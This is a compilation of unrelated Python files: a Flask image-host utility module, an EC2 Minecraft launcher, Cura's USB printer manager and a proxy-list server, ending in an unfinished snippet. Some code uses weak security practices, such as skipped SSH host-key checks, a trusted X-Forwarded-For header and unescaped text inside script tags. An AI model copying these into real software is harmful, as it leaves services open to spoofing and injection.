"%s:%s:%s:%s"
% (usr, pwd, expire, current_app.config["SECRET_KEY"])
)
== sha
):
signin = True
if not signin:
userinfo = {}
return (signin, userinfo)
def login_required(f):
"""页面要求登录装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not g.signin:
nu = get_redirect_url()
if nu and (nu.startswith("/") or nu.startswith(request.url_root)):
return redirect(url_for("front.login", next=nu))
else:
return redirect(url_for("front.login"))
return f(*args, **kwargs)
return decorated_function
def anonymous_required(f):
"""页面要求匿名装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if g.signin:
return redirect(url_for("front.index"))
return f(*args, **kwargs)
return decorated_function
def apilogin_required(f):
"""接口要求登录装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not g.signin:
return abort(403)
if g.signin and g.userinfo.status == 0:
return abort(
make_response(
jsonify(msg="The user is disabled, no operation", code=403), 403
)
)
return f(*args, **kwargs)
return decorated_function
def admin_apilogin_required(f):
"""接口要求管理员级别登录装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if g.signin:
if g.is_admin and g.userinfo.status == 1:
return f(*args, **kwargs)
else:
return abort(403)
else:
return abort(404)
return decorated_function
def parse_accept_language(acceptLanguage, default_language="zh-CN"):
if not acceptLanguage:
return default_language
languages = acceptLanguage.split(",")
locale_q_pairs = []
for language in languages:
if language.split(";")[0] == language:
# no q => q = 1
locale_q_pairs.append((language.strip(), "1"))
else:
locale = language.split(";")[0].strip()
q = language.split(";")[1].split("=")[1]
locale_q_pairs.append((locale, q))
return (
sorted(locale_q_pairs, key=lambda x: x[-1], reverse=True)[0][0]
or default_language
)
def dfr(res, default="en-US"):
"""定义前端返回,将res中msg字段转换语言
:param dict res: 例如 {"msg": "翻译内容(英文)", "other": "xx"}
:param str default: 默认语言
"""
try:
language = parse_accept_language(
request.cookies.get(
"locale", request.headers.get("Accept-Language", default)
),
default,
)
if language == "zh-Hans-CN":
language = "zh-CN"
except (ValueError, TypeError, KeyError, Exception):
language = default
    # Translation lookup table. TODO: move the translations into text files indexed by the English source text.
trans = {
        # Simplified Chinese
"zh-CN": {
"Hello World": "你好,世界",
"Parameter error": "参数错误",
"The upload_path type error": "upload_path类型错误",
"The upyun parameter error": "又拍云相关参数错误",
"Please install upyun module": "请安装upyun模块",
"Please install qiniu module": "请安装qiniu模块",
"The qiniu parameter error": "七牛云相关参数错误",
"The aliyun parameter error": "阿里云oss相关参数错误",
"The tencent parameter error": "腾讯云cos相关参数错误",
"The sm.ms parameter error": "sm.ms相关参数错误",
"The github parameter error": "GitHub相关参数错误",
"The gitee parameter error": "Gitee相关参数错误",
"An unknown error occurred in the program": "程序发生未知错误",
"Program data storage service error": "程序数据存储服务异常",
"Anonymous user is not sign in": "匿名用户未登录",
"No valid username found": "未发现有效用户名",
"The username or password parameter error": "用户名或密码参数错误",
"No data": "没有数据",
"No file or image format error": "未获取到文件或不允许的图片格式",
"All backend storage services failed to save pictures": "后端存储服务图片保存全部失败",
"No valid backend storage service": "无有效后端存储服务",
"No valid backend hook": "无有效后端钩子",
"The third module not found": "第三方模块未发现",
"Password verification failed": "密码验证失败",
"Password must be at least 6 characters": "密码最少6位",
"Confirm passwords do not match": "确认密码不匹配",
"Existing token": "已有token",
"No token yet": "还未有token",
"The username is invalid or registration is not allowed": "用户名不合法或不允许注册",
"The username already exists": "用户名已存在",
"Normal user login has been disabled": "已禁止普通用户登录",
"Illegal users are not allowed to modify": "不合法的用户禁止修改",
"The user setting must start with `ucfg_`": "用户设置必须以`ucfg_`开头",
"Invalid IP address": "无效的IP地址",
"Invalid url address": "无效的url",
"Not found the LinkId": "没有此LinkId",
"Not found the endpoint": "无此endpoint路由端点",
"Invalid HTTP method": "无效http方法",
"Invalid exterior_relation": "无效的exterior_relation平行规则",
"Invalid interior_relation": "无效的interior_relation内联规则",
"Wrong query range parameter": "查询范围错误",
"accepted": "已接受",
"Pending review, cannot upload pictures": "审核中,不能上传图片",
"The user is disabled, no operation": "用户被禁用,无权操作",
"Email send failed": "邮件发送失败",
"expired token": "token过期",
"useless": "无用token",
"Current state prohibits use of this method": "当前状态禁止使用此方法",
"The user has no authenticated mailbox": "用户没有验证过的邮箱",
"Interceptor processing rejection, upload aborted": "拦截器处理拒绝,上传中止",
"Request fail": "请求失败",
"Invalid expire param": "无效的expire参数",
"Users also have pictures that cannot be deleted": "用户还有图片,不能删除",
"The upload hook does not exist or is disabled": "上传钩子不存在或被禁用",
"User uploads are limited": "用户上传数量限制",
"the uploaded file exceeds the limit": "上传文件超出限制",
},
}
if isinstance(res, dict) and "en" not in language:
if res.get("msg"):
msg = res["msg"]
try:
new = trans[language][msg]
except KeyError:
logger.debug("Miss translation: %s" % msg)
else:
res["msg"] = new
return res
def change_res_format(res):
if isinstance(res, dict) and "code" in res:
sn = request.form.get("status_name", request.args.get("status_name")) or "code"
oc = request.form.get("ok_code", request.args.get("ok_code"))
mn = request.form.get("msg_name", request.args.get("msg_name"))
return format_apires(res, sn, oc, mn)
return res
def change_userinfo(userinfo):
"""解析用户信息userinfo部分字段数据"""
if userinfo and isinstance(userinfo, dict):
userinfo.update(
parsed_ucfg_url_rule=parse_valid_colon(userinfo.get("ucfg_url_rule")) or {},
parsed_ucfg_url_rule_switch=dict(
loadmypic=is_true(g.userinfo.get("ucfg_urlrule_inloadmypic")),
url=is_true(g.userinfo.get("ucfg_urlrule_incopyurl")),
html=is_true(g.userinfo.get("ucfg_urlrule_incopyhtml")),
rst=is_true(g.userinfo.get("ucfg_urlrule_incopyrst")),
markdown=is_true(g.userinfo.get("ucfg_urlrule_incopymd")),
),
            #: .. versionadded:: 1.7.0
            #: User status defaults to 1 (enabled); -2 and -1 mean pending review
            #: (upload disabled only); 0 means disabled with no permissions at all
status=int(userinfo.get("status", 1)),
#: .. versionadded:: 1.12.0
            #: parse labels
label=parse_label(userinfo.get("label")),
)
return userinfo
def get_site_config():
"""获取站点配置"""
s = get_storage()
cfg = s.get("siteconfig") or {}
return cfg
def set_site_config(mapping):
"""设置站点信息"""
if mapping and isinstance(mapping, dict):
ALLOWED_TAGS = ["a", "abbr", "b", "i", "code", "p", "br", "h3", "h4"]
ALLOWED_ATTRIBUTES = {
"a": ["href", "title", "target"],
"abbr": ["title"],
"*": ["style"],
}
ALLOWED_STYLES = ["color"]
upload_beforehtml = mapping.get("upload_beforehtml") or ""
bulletin = mapping.get("bulletin") or ""
about = mapping.get("about") or ""
if upload_beforehtml:
mapping["upload_beforehtml"] = bleach_html(
upload_beforehtml, ALLOWED_TAGS, ALLOWED_ATTRIBUTES, ALLOWED_STYLES
)
if bulletin:
ALLOWED_TAGS.append("img")
ALLOWED_ATTRIBUTES["img"] = ["title", "alt", "src", "width", "height"]
mapping["bulletin"] = bleach_html(
bulletin, ALLOWED_TAGS, ALLOWED_ATTRIBUTES, ALLOWED_STYLES
)
if about:
mapping["about"] = bleach_html(
about, ALLOWED_TAGS, ALLOWED_ATTRIBUTES, ALLOWED_STYLES
)
s = get_storage()
cfg = s.get("siteconfig") or {}
cfg.update(mapping)
s.set("siteconfig", cfg)
def check_username(usr):
"""检测用户名是否合法、是否可以注册"""
if usr and username_pat.match(usr):
cfg = get_site_config()
fus = set(parse_valid_comma(cfg.get("forbidden_username") or ""))
fus.add("anonymous")
if usr not in fus:
return True
return False
def guess_filename_from_url(url, allowed_exts=None):
"""从url中猜测图片文件名,其后缀符合控制台设定或默认予以返回。
首先尝试从url path猜测,比如http://example.com/upload/abc.png,这合法。
如果猜测失败,则从url query查找filename查询参数。
:param str url: 图片地址
:param list allowed_exts: 允许的图片后缀,比如['png', 'jpg'],
如未设置,则使用控制台设定或默认
:returns: 当图片合法时返回filename,否则None
.. versionadded:: 1.10.0
"""
_allowed_exts = [".{}".format(e) for e in get_allowed_suffix()]
ufn = basename(urlsplit(url).path)
if splitext(ufn)[-1] in _allowed_exts:
return ufn
else:
fns = parse_qs(urlsplit(url).query).get("filename")
if fns and isinstance(fns, (list, tuple)):
filename = fns[0]
if splitext(filename)[-1] in _allowed_exts:
return filename
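# Illustrative example (hypothetical URLs): with "png" among the allowed suffixes,
# guess_filename_from_url("http://example.com/upload/abc.png") returns "abc.png",
# while "http://example.com/download?filename=abc.png" falls back to the filename
# query parameter; anything else yields None.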
class JsonResponse(Response):
@classmethod
def force_type(cls, rv, environ=None):
if isinstance(rv, dict):
rv = jsonify(rv)
return super(JsonResponse, cls).force_type(rv, environ)
class FormFileStorage(object):
"""通过表单上传文件"""
def __init__(self, fp):
self._fp = fp
self._filename = None
self._tmppath = None
self._stream = None
self._size = 0
self.__parse()
def __parse(self):
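        # Spool the uploaded file to a named temporary file to measure its size on
        # disk, then load it into an in-memory BytesIO stream and delete the temp file.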
if self._fp:
self._filename = self._fp.filename
with NamedTemporaryFile(prefix="sapic", delete=False) as fp:
self._tmppath = fp.name
self._fp.save(fp.name)
self._size = getsize(self._tmppath)
with open(self._tmppath, "rb") as fp:
self._stream = BytesIO(fp.read())
remove(self._tmppath)
@property
def mimetype(self):
if self._fp:
return self._fp.mimetype
@property
def filename(self):
return self._filename
@property
def stream(self):
return self._stream
@property
def size(self):
"""return bytes"""
return self._size
def __bool__(self):
return bool(self._filename)
def __repr__(self):
return "<%s: %r (%d)>" % (
self.__class__.__name__,
self._filename,
self._size,
)
class Base64FileStorage(object):
"""上传接口中接受base64编码的图片。
允许来自前端的Data URI形式:
https://developer.mozilla.org/docs/Web/HTTP/data_URIs
"""
def __init__(self, b64str, filename=None):
self._filename = filename
#: data uri scheme
self._b64str = self.__set_data_uri(b64str)
self._parse = parse_data_uri(self._b64str)
if self.is_base64:
try:
                #: the data is now decoded to binary
self._parse["data"] = pic64decode(self._parse.data)
except (BaseDecodeError, TypeError, ValueError):
raise ValueError("The attempt to decode the image failed")
else:
raise ValueError("Not found base64")
def __set_data_uri(self, b64str):
if not PY2 and not isinstance(b64str, text_type):
b64str = b64str.decode("utf-8")
if not b64str.startswith("data:"):
b64str = "data:;base64,%s" % b64str
return b64str
@property
def mimetype(self):
return self._parse.mimetype
@property
def filename(self):
if not self._filename:
ext = imghdr.what(None, self._parse.data)
if not ext and self.mimetype:
mType, sType = self.mimetype.split("/")
if mType == "image": # without parse video
ext = sType
self._filename = "{}.{}".format(get_current_timestamp(), ext)
return self._filename
@property
def is_base64(self):
return self._parse.is_base64
@property
def stream(self):
if self.is_base64:
return BytesIO(self._parse.data)
@property
def size(self):
"""return bytes"""
if self.is_base64:
return b64size(self._b64str)
def __bool__(self):
return self.is_base64
class ImgUrlFileStorage(object):
"""上传接口中接受远程图片地址,会自动调用代理下载图片。"""
def __init__(self, imgurl, filename=None):
self._imgurl = imgurl
self._filename = filename
self._allowed_exts = [".{}".format(e) for e in get_allowed_suffix()]
self._imgobj = self.__download()
@property
def Headers(self):
return {"User-Agent": gen_ua()}
def __download(self):
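        # Fetch the remote URL through try_proxy_request and keep the response only
        # when its Content-Type is image/* or video/*; otherwise None is returned.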
if self._imgurl and url_pat.match(self._imgurl):
try:
resp = try_proxy_request(
self._imgurl,
method="get",
headers=self.Headers,
timeout=30,
)
resp.raise_for_status()
except (RequestException, Exception) as e:
logger.debug(e, exc_info=True)
else:
mime = resp.headers["Content-Type"].split("/")[0]
if mime in ("image", "video"):
return resp
@property
def filename(self):
"""定义url图片文件名:
如果给定文件名,则用,否则从url path猜测。
猜测失败,从url query查找filename参数。
未果,则读取图片二进制猜测格式。
未果,从返回标头Content-Type判断。
未果,文件名后缀可能是None,将不合要求。
"""
if not self._filename and self._imgobj:
ufn = guess_filename_from_url(self._imgobj.url, self._allowed_exts)
if ufn and splitext(ufn)[-1] in self._allowed_exts:
self._filename = ufn
return ufn
ext = imghdr.what(None, self._imgobj.content)
if not ext:
mType, sType = self._imgobj.headers["Content-Type"].split("/")
if mType in ("image", "video"):
ext = sType
self._filename = "{}.{}".format(get_current_timestamp(), ext)
return self._filename
@property
def stream(self):
if self._imgobj:
return BytesIO(self._imgobj.content)
@property
def getObj(self):
f = self.filename
if f and splitext(f)[-1] in self._allowed_exts:
return self if self._imgobj else None
@property
def size(self):
"""return bytes"""
if self._imgobj:
return int(self._imgobj.headers.get("Content-Length", 0))
def __bool__(self):
return True if self._imgobj else False
def get_upload_method(class_name):
if class_name in ("FileStorage", "FormFileStorage"):
return "file"
elif class_name == "ImgUrlFileStorage":
return "url"
elif class_name == "Base64FileStorage":
return "base64"
else:
return "unknown"
def _pip_install(pkg, index=None, upgrade=None):
"""使用pip安装模块到用户目录$HOME/.local"""
cmd = [executable, "-m", "pip", "install", "-q"]
if not is_venv():
cmd.append("--user")
if upgrade:
cmd.append("-U")
if index:
cmd.extend(["-i", index])
cmd.append(pkg)
retcode = call(cmd)
if retcode == 0:
set_page_msg(pkg + " 安装成功", "success")
_pip_list(no_fresh=False)
else:
set_page_msg(pkg + " 安装失败", "warn")
logger.info("{}, retcode: {}".format(" ".join(cmd), retcode))
def _pip_list(fmt=None, no_fresh=True):
"""获取pip list的JSON结果"""
key = rsp("cache", "piplist")
data = rc.get(key)
if is_true(no_fresh) and data:
data = json.loads(data)
else:
cmd = [executable, "-m", "pip", "list", "--format", "json"]
data = json.loads(check_output(cmd))
pipe = rc.pipeline()
pipe.set(key, json.dumps(data))
pipe.expire(key, 3600)
pipe.execute()
if fmt == "dict":
return {n["name"]: n for n in data}
else:
return data
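# Editor's illustration (a minimal sketch, not part of the original module): the same
# "pip list --format json" output used by _pip_list can be inspected directly, without
# the redis cache, for the interpreter running this process.
def _example_pip_list_names():
    """Return the names of installed packages by shelling out to pip."""
    out = check_output([executable, "-m", "pip", "list", "--format", "json"])
    return [pkg["name"] for pkg in json.loads(out)]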
def generate_activate_token(dump_data, max_age=600):
if dump_data and isinstance(dump_data, dict):
s = Serializer(current_app.config["SECRET_KEY"], expires_in=max_age)
data = s.dumps(dump_data)
return data.decode()
def check_activate_token(token):
res = dict(code=400)
if token:
s = Serializer(current_app.config["SECRET_KEY"])
try:
data = s.loads(token)
except SignatureExpired:
res.update(code=403, msg="expired token")
except BadSignature:
res.update(code=404, msg="useless token")
else:
res.update(code=0, data=data)
else:
res.update(msg="Parameter error")
return res
def sendmail(subject, message, to):
"""调用钩子中发送邮件函数(任意钩子发送成功即停止),要求用于Web上下文环境
:param str subject: 主题
:param str message: 正文(支持HTML)
:param str to: 收件人,可用逗号添加多个
"""
res = dict(code=1)
if subject and message and to and check_to_addr(to):
to = ",".join(parse_valid_comma(to))
data = current_app.extensions["hookmanager"].call(
_funcname="sendmail",
_mode="any_true",
_args=(subject, message, to),
)
logger.debug(data)
if is_all_fail(data):
res.update(msg="Email send failed", errors=data)
return res
else:
res.update(code=0)
else:
res.update(msg="Parameter error")
return res
def async_sendmail(subject, message, to):
"""异步邮件发送,可用于多线程及非Web上下文环境"""
def send_async_email(app):
with app.test_request_context():
app.preprocess_request()
sendmail(subject, message, to)
app = current_app._get_current_object()
t = Thread(target=send_async_email, args=[app])
t.start()
def make_email_tpl(tpl, **data):
"""制作邮件模板
:param tpl: 模板文件(位于templates/email/下)
:keyword data: 模板所用变量
:returns: jinja2渲染好的html内容
"""
je = Environment(
loader=FileSystemLoader(
pathjoin(current_app.root_path, current_app.template_folder, "email")
)
)
if "site_name" not in data:
data["site_name"] = g.site_name
if "url_root" not in data:
data["url_root"] = request.url_root
if "username" not in data:
data["username"] = g.userinfo.nickname or g.userinfo.username
return je.get_template(tpl).render(data)
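# Editor's illustration (a minimal sketch, not part of the original module): the same
# jinja2 calls used by make_email_tpl, rendering an inline template string so the example
# runs without the templates/email/ directory; the names and values are placeholders.
def _example_render_inline_template():
    env = Environment()
    tpl = env.from_string("Hello {{ username }}, welcome to {{ site_name }}!")
    return tpl.render(username="demo-user", site_name="example-site")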
def try_proxy_request(url, **kwargs):
"""自动调用代理服务的try_request
:param str url: 请求地址
:keyword kwars: :func:`utils.tool.try_request` 要求的其他参数
.. versionadded:: 1.9.0
"""
kwargs["proxy"] = (
dict(
[ps.split("=") for ps in comma_pat.split(g.cfg.proxies) if ps and "=" in ps]
)
if g.cfg.proxies
else None
)
return try_request(url, **kwargs)
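# Editor's illustration (a minimal sketch, not part of the original module): how a proxies
# setting such as "http=http://127.0.0.1:1080,https=http://127.0.0.1:1080" becomes the dict
# handed to try_request above. A plain comma split stands in for the module's comma_pat.
def _example_parse_proxies(proxies_cfg):
    return dict(
        ps.split("=", 1) for ps in proxies_cfg.split(",") if ps and "=" in ps
    )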
def set_page_msg(text, level="info"):
"""给管理员的控制台消息(任意环境均可)
:param str text: 消息内容
:param str level: 级别,info(默认)、success、error、warn
.. versionadded:: 1.9.0
"""
levels = dict(info=-1, warn=0, success=1, error=2)
if text and level in levels.keys():
return rc.rpush(
rsp("msg", "admin", "control"),
json.dumps(dict(text=text, icon=levels[level])),
)
def get_page_msg():
"""生成消息Js,仅在管理员控制台页面闪现消息(仅Web环境调用)"""
key = rsp("msg", "admin", "control")
msgs = rc.lrange(key, 0, -1)
if msgs:
def tpl_plus(total, new):
return total % new
def make_layer(msg):
return (
(
'layer.alert("@1",{icon:@2,offset:"rt",shade:0,'
'title:false,btn:"我知道了",btnAlign:"c",closeBtn:0},'
"function(index){layer.close(index);%s});"
)
.replace("@1", msg["text"])
.replace("@2", str(msg["icon"]))
)
html = (
"<script>",
reduce(tpl_plus, map(make_layer, [json.loads(i) for i in msgs])) % "",
"</script>",
)
rc.delete(key)
return Markup("".join(html))
else:
return ""
def push_user_msg(to, text, level="info", time=3, align="right"):
"""给用户推送消息(任意环境均可)
:param str to: 用户名
:param str text: 消息内容
:param str level: 级别,info(默认)、success、error、warn
:param int time: 超时时间,单位秒
:param str align: 消息显示位置,right右上角、center顶部中间、left左上角
.. versionadded:: 1.10.0
"""
if (
to
and text
and level in ("info", "warn", "success", "error")
and isinstance(time, int)
and align in ("left", "center", "right")
):
if rc.exists(rsp("account", to)):
return rc.rpush(
rsp("msg", to),
json.dumps(dict(text=text, level=level, time=time * 1000, align=align)),
)
def get_push_msg():
"""生成消息Js,仅在个人中心页面闪现消息(仅Web环境调用)"""
key = rsp("msg", g.userinfo.username)
msgs = rc.lrange(key, 0, -1)
if msgs:
def make_layer(data):
return ('message.push("{text}","{level}","{align}",{time});').format(
text=data["text"],
level=data["level"],
align=data["align"],
time=int(data["time"]),
)
html = (
"<script>"
'layui.use("message",function(){var message = layui.message;%s});'
"</script>"
) % "".join(map(make_layer, [json.loads(i) for i in msgs]))
rc.delete(key)
return Markup(html)
else:
return ""
def get_user_ip():
"""首先从HTTP标头的X-Forwarded-For获取代理IP,其次获取X-Real-IP,最后是客户端IP"""
ip = None
if request.headers.get("X-Forwarded-For"):
ip = request.headers["X-Forwarded-For"]
elif request.headers.get("X-Real-IP"):
ip = request.headers.get("X-Real-IP")
else:
ip = request.remote_addr
return ip or ""
def has_image(sha):
"""是否存在图片"""
gk = rsp("index", "global")
ik = rsp("image", sha)
pipe = rc.pipeline()
pipe.sismember(gk, sha)
pipe.exists(ik)
result = pipe.execute()
return result == [True, 1]
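# Editor's illustration (a minimal sketch, not part of the original module): the two-command
# redis pipeline behind has_image, written against an explicit redis-py client and explicit
# key names instead of the project's rc/rsp helpers.
def _example_has_image(redis_client, global_index_key, image_key, sha):
    pipe = redis_client.pipeline()
    pipe.sismember(global_index_key, sha)
    pipe.exists(image_key)
    is_member, key_count = pipe.execute()
    return bool(is_member) and key_count == 1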
def get_allowed_suffix():
"""获取允许上传的后缀(允许视频,后缀无点)"""
allowed = parse_valid_verticaline(g.cfg.upload_exts) or ALLOWED_EXTS
if is_true(g.cfg.upload_video):
allowed += ALLOWED_VIDEO
return allowed
def allowed_suffix(filename):
"""判断filename是否匹配控制台配置的上传后缀(及默认)
:param str filename: 图片文件名
:rtype: boolean
.. versionadded:: 1.10.0
"""
return partial(allowed_file, suffix=get_allowed_suffix())(filename)
def up_size_limit():
limit = current_app.config["MAX_UPLOAD"]
up_size = g.cfg.upload_size
if up_size:
try:
up_size = int(up_size)
except (ValueError, TypeError):
pass
else:
limit = up_size
return limit * 1024 * 1024
|
server.py
|
from flask import Flask, render_template, request, jsonify
from flask_cors import CORS, cross_origin
from multiprocessing import Process
from configuration import Config
import json
import boto3
import time
import paramiko
import os
app = Flask(__name__)
CORS(app)
#Paramiko ssh information
dirname = os.path.dirname(__file__)
filename = os.path.join(dirname, Config.SSH_KEY_FILE_PATH)
key = paramiko.RSAKey.from_private_key_file(filename)
sshClient = paramiko.SSHClient()
sshClient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#Waits for the server to reach a valid state so that commands can be executed on the server
def serverWaitOk(instanceIp, client):
checksPassed = False
status = 'initializing'
instanceIds=[Config.INSTANCE_ID]
while (not checksPassed) and (status == 'initializing'):
statusCheckResponse = client.describe_instance_status(InstanceIds = instanceIds)
instanceStatuses = statusCheckResponse['InstanceStatuses']
instanceStatus = instanceStatuses[0]
instanceStatus = instanceStatus['InstanceStatus']
status = instanceStatus['Status']
checksPassed = status == 'ok'
time.sleep(5)
if checksPassed:
initServerCommands(instanceIp)
else:
        print('An error has occurred booting the server')
#SSH connects to server and executes command to boot minecraft server
def initServerCommands(instanceIp):
# Connect/ssh to an instance
try:
# Here 'ubuntu' is user name and 'instance_ip' is public IP of EC2
sshClient.connect(hostname=instanceIp, username="ubuntu", pkey=key)
# Execute a command(cmd) after connecting/ssh to an instance
stdin, stdout, stderr = sshClient.exec_command(
"screen -dmS minecraft bash -c 'sudo java -Xmx1024M -Xms1024M -jar"
" ./OnDemandMinecraft/server.jar nogui'"
)
print("COMMAND EXECUTED")
# close the client connection once the job is done
sshClient.close()
except:
print('Error running server commands')
#Main endpoint for loading the webpage
@app.route('/')
def loadIndex():
return render_template('index.html')
@app.route('/initServerMC', methods = ['POST'])
def initServerMC():
inputPass = request.form['pass']
returnData = {}
if inputPass == Config.SERVER_PASSWORD:
#Instantiate server here or return ip address if already running
client = boto3.client(
'ec2',
aws_access_key_id=Config.ACCESS_KEY,
aws_secret_access_key=Config.SECRET_KEY,
region_name=Config.ec2_region
)
ipAddress = manageServer(client)
returnData['ip'] = ipAddress
returnData['success'] = True
else:
returnData['success'] = False
print("\nFINAL RETURN VALUE\n")
print(str(returnData))
print("\n")
return json.dumps(returnData)
#Gets IP Address for return to webpage otherwise boots server
def manageServer(client):
returnString = 'ERROR'
instanceIds = [Config.INSTANCE_ID]
response = client.describe_instances(InstanceIds = instanceIds)
reservations = response['Reservations']
reservation = reservations[0]
instances = reservation['Instances']
print("\nSERVER INSTANCES\n")
print(instances)
print("\n")
if len(instances) > 0:
instance = instances[0]
state = instance['State']
stateName = state['Name']
if (stateName == 'stopped') or (stateName == 'shutting-down'):
#SETUP MULTIPROCESSING HERE INSTEAD OF REDIS
returnString = startServer(client)
elif stateName == 'running':
returnString = 'IP: ' + instance['PublicIpAddress']
else:
returnString = 'ERROR'
return returnString
#Starts the specified AWS Instance from the configuration
def startServer(client):
#Gets proper variables to attempt to instantiate EC2 instance and start minecraft server
returnString = 'ERROR'
instanceIds = [Config.INSTANCE_ID]
response = client.start_instances(InstanceIds = instanceIds)
stateCode = 0
while not (stateCode == 16):
time.sleep(3)
print('\nAWS EC2 START RESPONSE\n')
print(str(response))
print('\n')
response = client.describe_instances(InstanceIds = instanceIds)
reservations = response['Reservations']
reservation = reservations[0]
instances = reservation['Instances']
instance = instances[0]
state = instance['State']
stateCode = state['Code']
print("\nSERVER INSTANCES\n")
print(instances)
print("\n")
ipAddress = instance['PublicIpAddress']
returnString = 'Server is starting, this may take a few minutes.\nIP: ' + ipAddress
#SETUP MULTIPROCESSING HERE INSTEAD OF REDIS
p = Process(target=serverWaitOk, args=(ipAddress, client))
p.start()
return returnString
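#Editor's illustration (a minimal sketch, not wired to any route): the boto3 counterpart to
#startServer for shutting the instance back down; it reuses the same Config values as above.
def stopServer(client):
    response = client.stop_instances(InstanceIds=[Config.INSTANCE_ID])
    print('\nAWS EC2 STOP RESPONSE\n')
    print(str(response))
    return response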
|
USBPrinterOutputDeviceManager.py
|
# Copyright (c) 2018 Ultimaker B.V.
# Cura is released under the terms of the LGPLv3 or higher.
import threading
import time
import serial.tools.list_ports
from os import environ
from re import search
from PyQt5.QtCore import QObject, pyqtSignal
from UM.Signal import Signal, signalemitter
from UM.OutputDevice.OutputDevicePlugin import OutputDevicePlugin
from UM.i18n import i18nCatalog
from cura.PrinterOutput.PrinterOutputDevice import ConnectionState
from . import USBPrinterOutputDevice
i18n_catalog = i18nCatalog("cura")
## Manager class that ensures that a USBPrinterOutputDevice is created for every connected USB printer.
@signalemitter
class USBPrinterOutputDeviceManager(QObject, OutputDevicePlugin):
addUSBOutputDeviceSignal = Signal()
progressChanged = pyqtSignal()
def __init__(self, application, parent = None):
if USBPrinterOutputDeviceManager.__instance is not None:
raise RuntimeError("Try to create singleton '%s' more than once" % self.__class__.__name__)
USBPrinterOutputDeviceManager.__instance = self
super().__init__(parent = parent)
self._application = application
self._serial_port_list = []
self._usb_output_devices = {}
self._usb_output_devices_model = None
self._update_thread = threading.Thread(target = self._updateThread)
self._update_thread.setDaemon(True)
self._check_updates = True
self._application.applicationShuttingDown.connect(self.stop)
# Because the model needs to be created in the same thread as the QMLEngine, we use a signal.
self.addUSBOutputDeviceSignal.connect(self.addOutputDevice)
self._application.globalContainerStackChanged.connect(self.updateUSBPrinterOutputDevices)
    # This method updates/resets the USB settings for all connected USB devices
def updateUSBPrinterOutputDevices(self):
for key, device in self._usb_output_devices.items():
if isinstance(device, USBPrinterOutputDevice.USBPrinterOutputDevice):
device.resetDeviceSettings()
def start(self):
self._check_updates = True
self._update_thread.start()
def stop(self, store_data: bool = True):
self._check_updates = False
def _onConnectionStateChanged(self, serial_port):
if serial_port not in self._usb_output_devices:
return
changed_device = self._usb_output_devices[serial_port]
if changed_device.connectionState == ConnectionState.Connected:
self.getOutputDeviceManager().addOutputDevice(changed_device)
else:
self.getOutputDeviceManager().removeOutputDevice(serial_port)
def _updateThread(self):
while self._check_updates:
container_stack = self._application.getGlobalContainerStack()
if container_stack is None:
time.sleep(5)
continue
port_list = [] # Just an empty list; all USB devices will be removed.
if container_stack.getMetaDataEntry("supports_usb_connection"):
machine_file_formats = [file_type.strip() for file_type in container_stack.getMetaDataEntry("file_formats").split(";")]
if "text/x-gcode" in machine_file_formats:
port_list = self.getSerialPortList(only_list_usb=True)
self._addRemovePorts(port_list)
time.sleep(5)
## Helper to identify serial ports (and scan for them)
def _addRemovePorts(self, serial_ports):
# First, find and add all new or changed keys
for serial_port in list(serial_ports):
if serial_port not in self._serial_port_list:
                self.addUSBOutputDeviceSignal.emit(serial_port) # Hack to ensure it's created in the main thread
continue
self._serial_port_list = list(serial_ports)
for port, device in self._usb_output_devices.items():
if port not in self._serial_port_list:
device.close()
## Because the model needs to be created in the same thread as the QMLEngine, we use a signal.
def addOutputDevice(self, serial_port):
device = USBPrinterOutputDevice.USBPrinterOutputDevice(serial_port)
device.connectionStateChanged.connect(self._onConnectionStateChanged)
self._usb_output_devices[serial_port] = device
device.connect()
## Create a list of serial ports on the system.
# \param only_list_usb If true, only usb ports are listed
def getSerialPortList(self, only_list_usb = False):
base_list = []
for port in serial.tools.list_ports.comports():
if not isinstance(port, tuple):
port = (port.device, port.description, port.hwid)
if only_list_usb and not port[2].startswith("USB"):
continue
# To prevent cura from messing with serial ports of other devices,
# filter by regular expressions passed in as environment variables.
# Get possible patterns with python3 -m serial.tools.list_ports -v
# set CURA_DEVICENAMES=USB[1-9] -> e.g. not matching /dev/ttyUSB0
pattern = environ.get('CURA_DEVICENAMES')
if pattern and not search(pattern, port[0]):
continue
# set CURA_DEVICETYPES=CP2102 -> match a type of serial converter
pattern = environ.get('CURA_DEVICETYPES')
if pattern and not search(pattern, port[1]):
continue
# set CURA_DEVICEINFOS=LOCATION=2-1.4 -> match a physical port
# set CURA_DEVICEINFOS=VID:PID=10C4:EA60 -> match a vendor:product
pattern = environ.get('CURA_DEVICEINFOS')
if pattern and not search(pattern, port[2]):
continue
base_list += [port[0]]
return list(base_list)
__instance = None # type: USBPrinterOutputDeviceManager
@classmethod
def getInstance(cls, *args, **kwargs) -> "USBPrinterOutputDeviceManager":
return cls.__instance
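# Editor's illustration (a minimal sketch, not part of the plugin): listing candidate USB
# serial ports with pyserial, the same API getSerialPortList() wraps above.
def example_list_usb_ports():
    return [(port.device, port.description)
            for port in serial.tools.list_ports.comports()
            if port.hwid.startswith("USB")]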
|
proxiesmanager.py
|
from config import CONFIG
from http.server import BaseHTTPRequestHandler, HTTPServer
from proxyset import ProxySet
import threading
class ProxiesManager:
def __init__(self, proxyset: ProxySet):
class ProxyModifyRequestHandler(BaseHTTPRequestHandler):
def do_PUT(self):
try:
with open('proxies.txt') as f:
proxyset.renew_proxies({line.rstrip('\n') for line in f})
except Exception as e:
self.send_response(500)
self.end_headers()
self.wfile.write(str(e).encode('utf-8'))
return
self.send_response(200)
self.end_headers()
def do_POST(self):
self.send_response(200)
self.end_headers()
for proxy in proxyset.get_blocked_proxies():
self.wfile.write(proxy.encode('utf-8'))
self.wfile.write(b'\n')
def do_GET(self):
self.send_response(200)
self.end_headers()
for proxy in proxyset.get_avail_proxies():
self.wfile.write(proxy.encode('utf-8'))
self.wfile.write(b'\n')
self.handler = ProxyModifyRequestHandler
def start(self):
httpd = HTTPServer((CONFIG['server_address'], CONFIG['server_port']), self.handler)
threading.Thread(target=lambda: httpd.serve_forever(), daemon=True).start()
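# Editor's illustration (a minimal sketch): starting the manager and reading the available
# proxies over HTTP. ProxySet's constructor is assumed here to take no required arguments;
# adjust to the real class if it does.
if __name__ == "__main__":
    import urllib.request
    manager = ProxiesManager(ProxySet())
    manager.start()
    url = "http://{}:{}/".format(CONFIG['server_address'], CONFIG['server_port'])
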